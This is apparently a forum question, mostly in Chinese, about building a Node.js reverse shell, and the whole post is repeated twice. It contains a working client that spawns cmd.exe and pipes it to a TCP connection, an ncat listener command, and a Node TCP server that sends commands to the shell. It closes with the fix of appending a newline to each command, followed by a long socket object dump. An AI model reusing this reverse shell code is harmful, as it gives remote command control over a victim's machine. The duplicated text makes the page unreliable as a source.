Nodejs 反向 shell 与 net.socket
Nodejs reverse shell with net.socket
大家早上好,我在 NodeJS 中遇到了反向 shell 的问题:当我创建套接字并用 netcat 监听时,一切正常;但当我用 net.Server 创建服务器时,我能收到 shell,但它不是交互式的。shell 端代码如下:
// Self-invoking client: spawns cmd.exe and joins its stdin/stdout/stderr to a
// TCP connection made to 192.168.1.2:4545, so whichever side is listening
// there drives the shell over the socket. On the host this shows up as a node
// process with a cmd.exe child and an outbound connection to that address/port.
(function(){
var net = require("net"),
child = require("child_process"),
shell = child.spawn("cmd.exe", []);
var client = new net.Socket();
client.connect(4545, "192.168.1.2", function(){
// Bytes arriving on the socket become shell input; the shell's output and
// errors are written back out on the same socket.
client.pipe(shell.stdin);
shell.stdout.pipe(client);
shell.stderr.pipe(client);
});
// The IIFE's result is not assigned anywhere, so this return value is unused;
// `/a/` is just an arbitrary expression.
return /a/;
})();
当我用 netcat 监听时,我可以得到反向 shell:
# Listen on TCP port 4545 (-l -p 4545), verbose (-v), no DNS resolution (-n);
# the client above connects to this listener.
ncat -nvlp 4545
但当我想在 nodejs 中自己创建 TCP 服务器时就出了问题:我收到了 cmd.exe 的启动横幅,但无法交互。
这是服务器部分的代码:
// Listener side written in Node: accepts one connection, writes a command
// into it and logs what comes back.
const net = require("net");
let server = new net.Server();
// Bound to 192.168.1.2:4545; nothing authenticates the peer, so any host that
// can reach that address/port triggers the 'connection' handler below.
server.listen({ host: '192.168.1.2', port: 4545 }, () => {
console.log(`Server listen in 4545`);
});
server.on("close", () => {
console.log('connection closed')
});
server.on("error", (e) => {
if (e.code === "EADDRINUSE") {
console.log("Address in use, retrying...");
setTimeout(() => {
// Arrow functions do not rebind `this`, so this is the module-level `this`
// and `this.server` is undefined: both calls throw a TypeError. The object
// meant here is the `server` variable declared above.
this.server.close();
this.server.listen(4545, '192.168.1.2');
}, 2000);
}
});
server.on("connection", (socket) => {
console.log("new connection");
// HERE I SEND COMMAND WITH ELECTRON JS
// Written with no trailing newline, so the remote cmd.exe never receives a
// completed line — this is what the author's later fix (appending '\n') changes.
socket.write('command');
// Parentheses are unbalanced on this line (a SyntaxError as pasted). Even
// once balanced, socket.pipe(socket) only echoes the peer's bytes straight
// back and returns the socket itself — that returned object is the big
// `Socket { ... }` dump shown below, not the command's output.
console.log((socket.pipe(socket));
// Socket is quitted
socket.on("close", () => {
console.log('socket closed')
});
socket.on("end", () => {
// `${socket}` stringifies to "[object Object]"; socket.remoteAddress and
// socket.remotePort would identify the peer readably.
console.log(`Client ${socket} disconnected`);
socket.destroy();
});
});
当我发送命令(例如 'dir')时,我收到的是一个对象,它来自上面服务器代码中的 socket.pipe 调用。
所以问题是:当我发送命令时,如何在 socket 上接收命令的结果,例如文件和目录列表?
Socket {
connecting: false,
_hadError: false,
_parent: null,
_host: null,
_readableState: ReadableState {
objectMode: false,
highWaterMark: 16384,
buffer: BufferList { head: null, tail: null, length: 0 },
length: 0,
pipes: [Circular],
pipesCount: 1,
flowing: true,
ended: false,
endEmitted: false,
reading: true,
sync: false,
needReadable: true,
emittedReadable: false,
readableListening: false,
resumeScheduled: false,
paused: false,
emitClose: false,
autoDestroy: false,
destroyed: false,
defaultEncoding: 'utf8',
awaitDrain: 0,
readingMore: false,
decoder: null,
encoding: null
},
readable: true,
_events: [Object: null prototype] {
end: [ [Function: onReadableStreamEnd], [Function], [Function] ],
close: [ [Function], [Function] ],
data: [ [Function], [Function: ondata] ],
unpipe: [Function: onunpipe],
error: [Function: onerror],
finish: [Function: bound onceWrapper] { listener: [Function: onfinish] }
},
_eventsCount: 6,
_maxListeners: undefined,
_writableState: WritableState {
objectMode: false,
highWaterMark: 16384,
finalCalled: false,
needDrain: false,
ending: false,
ended: false,
finished: false,
destroyed: false,
decodeStrings: false,
defaultEncoding: 'utf8',
length: 0,
writing: false,
corked: 0,
sync: false,
bufferProcessing: false,
onwrite: [Function: bound onwrite],
writecb: null,
writelen: 0,
afterWriteTickInfo: {
count: 1,
cb: [Function: nop],
stream: [Circular],
state: [Circular]
},
bufferedRequest: null,
lastBufferedRequest: null,
pendingcb: 1,
prefinished: false,
errorEmitted: false,
emitClose: false,
autoDestroy: false,
bufferedRequestCount: 0,
corkedRequestsFree: {
next: null,
entry: null,
finish: [Function: bound onCorkedFinish]
}
},
writable: true,
allowHalfOpen: false,
_sockname: { address: '192.168.1.2', family: 'IPv4', port: 4545},
_pendingData: null,
_pendingEncoding: '',
server: Server {
_events: [Object: null prototype] {
listening: [Function],
close: [Function],
error: [Function],
connection: [Function]
},
_eventsCount: 4,
_maxListeners: undefined,
_connections: 1,
_handle: TCP {
reading: false,
onconnection: [Function: onconnection],
[Symbol(owner)]: [Circular]
},
_usingWorkers: false,
_workers: [],
_unref: false,
allowHalfOpen: false,
pauseOnConnect: false,
_connectionKey: '4:192.168.1.2:4443',
[Symbol(asyncId)]: 16
},
_server: Server {
_events: [Object: null prototype] {
listening: [Function],
close: [Function],
error: [Function],
connection: [Function]
},
_eventsCount: 4,
_maxListeners: undefined,
_connections: 1,
_handle: TCP {
reading: false,
onconnection: [Function: onconnection],
[Symbol(owner)]: [Circular]
},
_usingWorkers: false,
_workers: [],
_unref: false,
allowHalfOpen: false,
pauseOnConnect: false,
_connectionKey: '4:192.168.1.2:4545',
[Symbol(asyncId)]: 16
},
id: 790,
_peername: { address: '192.168.1.2', family: 'IPv4', port: 59793 },
[Symbol(asyncId)]: 18,
[Symbol(kHandle)]: TCP {
reading: true,
onconnection: null,
[Symbol(owner)]: [Circular]
},
[Symbol(lastWriteQueueSize)]: 0,
[Symbol(timeout)]: null,
[Symbol(kBuffer)]: null,
[Symbol(kBufferCb)]: null,
[Symbol(kBufferGen)]: null,
[Symbol(kBytesRead)]: 0,
[Symbol(kBytesWritten)]: 0
}
经过几次尝试,我发现在写入的内容末尾加上 \n(相当于回车,让 cmd.exe 执行这一行)就能解决,所以代码变成:
// The trailing '\n' terminates the line; cmd.exe only executes a completed
// line, which is why the earlier write without it produced no output.
socket.write('command'+ '\n');
大家早上好,我在 NodeJS 中遇到了反向 shell 的问题:当我创建套接字并用 netcat 监听时,一切正常;但当我用 net.Server 创建服务器时,我能收到 shell,但它不是交互式的。shell 端代码如下:
// Self-invoking client: spawns cmd.exe and joins its stdin/stdout/stderr to a
// TCP connection made to 192.168.1.2:4545, so whichever side is listening
// there drives the shell over the socket. On the host this shows up as a node
// process with a cmd.exe child and an outbound connection to that address/port.
(function(){
var net = require("net"),
child = require("child_process"),
shell = child.spawn("cmd.exe", []);
var client = new net.Socket();
client.connect(4545, "192.168.1.2", function(){
// Bytes arriving on the socket become shell input; the shell's output and
// errors are written back out on the same socket.
client.pipe(shell.stdin);
shell.stdout.pipe(client);
shell.stderr.pipe(client);
});
// The IIFE's result is not assigned anywhere, so this return value is unused;
// `/a/` is just an arbitrary expression.
return /a/;
})();
当我用 netcat 监听时,我可以得到反向 shell:
# Listen on TCP port 4545 (-l -p 4545), verbose (-v), no DNS resolution (-n);
# the client above connects to this listener.
ncat -nvlp 4545
但当我想在 nodejs 中自己创建 TCP 服务器时就出了问题:我收到了 cmd.exe 的启动横幅,但无法交互。
这是服务器部分的代码:
// Listener side written in Node: accepts one connection, writes a command
// into it and logs what comes back.
const net = require("net");
let server = new net.Server();
// Bound to 192.168.1.2:4545; nothing authenticates the peer, so any host that
// can reach that address/port triggers the 'connection' handler below.
server.listen({ host: '192.168.1.2', port: 4545 }, () => {
console.log(`Server listen in 4545`);
});
server.on("close", () => {
console.log('connection closed')
});
server.on("error", (e) => {
if (e.code === "EADDRINUSE") {
console.log("Address in use, retrying...");
setTimeout(() => {
// Arrow functions do not rebind `this`, so this is the module-level `this`
// and `this.server` is undefined: both calls throw a TypeError. The object
// meant here is the `server` variable declared above.
this.server.close();
this.server.listen(4545, '192.168.1.2');
}, 2000);
}
});
server.on("connection", (socket) => {
console.log("new connection");
// HERE I SEND COMMAND WITH ELECTRON JS
// Written with no trailing newline, so the remote cmd.exe never receives a
// completed line — this is what the author's later fix (appending '\n') changes.
socket.write('command');
// Parentheses are unbalanced on this line (a SyntaxError as pasted). Even
// once balanced, socket.pipe(socket) only echoes the peer's bytes straight
// back and returns the socket itself — that returned object is the big
// `Socket { ... }` dump shown below, not the command's output.
console.log((socket.pipe(socket));
// Socket is quitted
socket.on("close", () => {
console.log('socket closed')
});
socket.on("end", () => {
// `${socket}` stringifies to "[object Object]"; socket.remoteAddress and
// socket.remotePort would identify the peer readably.
console.log(`Client ${socket} disconnected`);
socket.destroy();
});
});
当我发送命令(例如 'dir')时,我收到的是一个对象,它来自上面服务器代码中的 socket.pipe 调用。所以问题是:当我发送命令时,如何在 socket 上接收命令的结果,例如文件和目录列表?
Socket {
connecting: false,
_hadError: false,
_parent: null,
_host: null,
_readableState: ReadableState {
objectMode: false,
highWaterMark: 16384,
buffer: BufferList { head: null, tail: null, length: 0 },
length: 0,
pipes: [Circular],
pipesCount: 1,
flowing: true,
ended: false,
endEmitted: false,
reading: true,
sync: false,
needReadable: true,
emittedReadable: false,
readableListening: false,
resumeScheduled: false,
paused: false,
emitClose: false,
autoDestroy: false,
destroyed: false,
defaultEncoding: 'utf8',
awaitDrain: 0,
readingMore: false,
decoder: null,
encoding: null
},
readable: true,
_events: [Object: null prototype] {
end: [ [Function: onReadableStreamEnd], [Function], [Function] ],
close: [ [Function], [Function] ],
data: [ [Function], [Function: ondata] ],
unpipe: [Function: onunpipe],
error: [Function: onerror],
finish: [Function: bound onceWrapper] { listener: [Function: onfinish] }
},
_eventsCount: 6,
_maxListeners: undefined,
_writableState: WritableState {
objectMode: false,
highWaterMark: 16384,
finalCalled: false,
needDrain: false,
ending: false,
ended: false,
finished: false,
destroyed: false,
decodeStrings: false,
defaultEncoding: 'utf8',
length: 0,
writing: false,
corked: 0,
sync: false,
bufferProcessing: false,
onwrite: [Function: bound onwrite],
writecb: null,
writelen: 0,
afterWriteTickInfo: {
count: 1,
cb: [Function: nop],
stream: [Circular],
state: [Circular]
},
bufferedRequest: null,
lastBufferedRequest: null,
pendingcb: 1,
prefinished: false,
errorEmitted: false,
emitClose: false,
autoDestroy: false,
bufferedRequestCount: 0,
corkedRequestsFree: {
next: null,
entry: null,
finish: [Function: bound onCorkedFinish]
}
},
writable: true,
allowHalfOpen: false,
_sockname: { address: '192.168.1.2', family: 'IPv4', port: 4545},
_pendingData: null,
_pendingEncoding: '',
server: Server {
_events: [Object: null prototype] {
listening: [Function],
close: [Function],
error: [Function],
connection: [Function]
},
_eventsCount: 4,
_maxListeners: undefined,
_connections: 1,
_handle: TCP {
reading: false,
onconnection: [Function: onconnection],
[Symbol(owner)]: [Circular]
},
_usingWorkers: false,
_workers: [],
_unref: false,
allowHalfOpen: false,
pauseOnConnect: false,
_connectionKey: '4:192.168.1.2:4443',
[Symbol(asyncId)]: 16
},
_server: Server {
_events: [Object: null prototype] {
listening: [Function],
close: [Function],
error: [Function],
connection: [Function]
},
_eventsCount: 4,
_maxListeners: undefined,
_connections: 1,
_handle: TCP {
reading: false,
onconnection: [Function: onconnection],
[Symbol(owner)]: [Circular]
},
_usingWorkers: false,
_workers: [],
_unref: false,
allowHalfOpen: false,
pauseOnConnect: false,
_connectionKey: '4:192.168.1.2:4545',
[Symbol(asyncId)]: 16
},
id: 790,
_peername: { address: '192.168.1.2', family: 'IPv4', port: 59793 },
[Symbol(asyncId)]: 18,
[Symbol(kHandle)]: TCP {
reading: true,
onconnection: null,
[Symbol(owner)]: [Circular]
},
[Symbol(lastWriteQueueSize)]: 0,
[Symbol(timeout)]: null,
[Symbol(kBuffer)]: null,
[Symbol(kBufferCb)]: null,
[Symbol(kBufferGen)]: null,
[Symbol(kBytesRead)]: 0,
[Symbol(kBytesWritten)]: 0
}
经过几次尝试,我发现在写入的内容末尾加上 \n(相当于回车,让 cmd.exe 执行这一行)就能解决,所以代码变成:
// The trailing '\n' terminates the line; cmd.exe only executes a completed
// line, which is why the earlier write without it produced no output.
socket.write('command'+ '\n');